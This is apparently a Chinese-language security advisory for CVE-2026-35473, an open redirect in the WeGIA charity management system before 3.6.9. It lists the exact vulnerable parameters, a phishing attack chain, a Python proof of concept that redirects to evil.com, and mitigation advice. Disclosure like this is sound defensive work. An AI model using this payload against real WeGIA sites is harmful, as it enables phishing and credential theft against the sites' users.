CVE-2026-35473 CVSS 6.1 中危

CVE-2026-35473 WeGIA开放重定向漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35473

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA

漏洞概述

WeGIA是一个面向慈善机构的Web管理系统。在3.6.9版本之前，其/WeGIA/controle/control.php端点存在开放重定向漏洞。攻击者可利用nextPage参数（配合metodo=listarId和nomeClasse=IentradaControle），将用户重定向至任意恶意网站。由于重定向发生在受信任的域名下，攻击者可借此进行高效的网络钓鱼、窃取用户凭证及恶意软件分发。该问题已在3.6.9版本中得到修复。

技术细节

该漏洞的根本原因在于WeGIA应用程序在/WeGIA/controle/control.php端点处理重定向逻辑时，未对用户输入的nextPage参数进行有效的安全校验。当攻击者发送包含metodo=listarId和nomeClasse=IentradaControle参数的请求时，系统会直接读取nextPage的值并将其作为HTTP 302重定向的目标地址。由于代码中缺乏对目标URL的域名白名单验证或URL编码检查，攻击者能够轻易植入任意外部链接（例如恶意钓鱼站点）。一旦受害者访问了精心构造的恶意URL，浏览器将基于对WeGIA合法域名的信任，自动跳转至攻击者指定页面。这种开放重定向漏洞常被用于绕过邮件网关的安全检测，实施复杂的网络钓鱼攻击，进而窃取用户敏感凭据或分发恶意载荷。

攻击链分析

STEP 1

侦察

攻击者识别出使用WeGIA且版本低于3.6.9的目标网站。

STEP 2

构造攻击链接

攻击者构造包含恶意nextPage参数的URL，设置metodo=listarId和nomeClasse=IentradaControle。

STEP 3

社会工程学投递

攻击者通过电子邮件或即时通讯工具，将伪装成合法的WeGIA链接发送给目标用户。

STEP 4

诱导重定向

用户点击链接，服务器返回302重定向响应，将用户浏览器跳转至攻击者控制的钓鱼网站。

STEP 5

窃取凭据

由于用户认为仍在受信任的WeGIA域名下，容易在钓鱼页面输入敏感信息，导致凭据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

def exploit_open_redirect(target_host):
    # Vulnerable endpoint
    url = f"{target_host}/WeGIA/controle/control.php"
    
    # Malicious redirect destination
    malicious_site = "http://evil.com"
    
    # Payload construction based on advisory
    params = {
        "metodo": "listarId",
        "nomeClasse": "IentradaControle",
        "nextPage": malicious_site
    }
    
    try:
        # Send request, do not follow redirects to verify the 302 response
        response = requests.get(url, params=params, timeout=10, allow_redirects=False)
        
        if response.status_code == 302:
            location = response.headers.get('Location')
            if malicious_site in location:
                print(f"[+] Vulnerability Confirmed!")
                print(f"[+] Redirecting to: {location}")
                return True
        print("[-] Target not vulnerable or patched.")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

if __name__ == "__main__":
    target = "http://localhost" # Replace with actual target
    exploit_open_redirect(target)

影响范围

WeGIA < 3.6.9

防御指南

临时缓解措施

如果无法立即升级，建议在反向代理（如Nginx）层面添加规则，清洗或拦截包含外部域名的nextPage参数请求。同时，应加强用户安全意识教育，提醒用户不要盲目信任看似来自官方域名的重定向链接。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表